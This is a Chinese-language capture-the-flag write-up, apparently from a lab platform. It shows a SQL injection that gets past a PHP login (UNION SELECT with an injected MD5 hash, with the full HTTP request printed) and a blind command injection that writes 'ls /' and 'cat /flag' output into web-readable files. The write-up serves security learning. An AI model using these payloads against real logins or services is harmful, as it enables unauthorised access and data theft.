这里提示是命令执行

抓包发现有五个报文
其中login.php中有base64加密语句

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

这里得到SQL语句的组成，开始绕过密码判断

POST /login.php HTTP/1.1
Host: 114.67.175.224:14715
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:14715
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://114.67.175.224:14715/login.php?password=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_c1b044f909411ac4213045f0478e96fc=1711286763; _ga=GA1.1.52075818.1711286767; _ga_F3VRZT58SJ=GS1.1.1711288951.2.1.1711290145.0.0.0; PHPSESSID=ohlo1q3nbms2srg6aav8cgase6
Connection: close

username=admin'UNION SELECT 1,md5(123)#&password=123

这里账号为admin，然后使用联合查询使得返回的两个空格，1空格代表账号，二空格代表密码，这里我们直接将二空格的密码填充为123的md5值，$row['password']得到的就是这个123的md5值，而我们用password传递的123就会变成$password，这时$row['password']===md5($password)为真，成功绕过密码

来到服务查询页面

试了试ssh等服务查询

开始命令执行绕过
命令执行没有回显

利用sleep看看是否执行了

这里确实是执行了，但是没有回显
将结果写成可访问文件

| ls / > a.html

访问得到命令执行回显
看到flag文件

| cat /flag > b.html

得到flag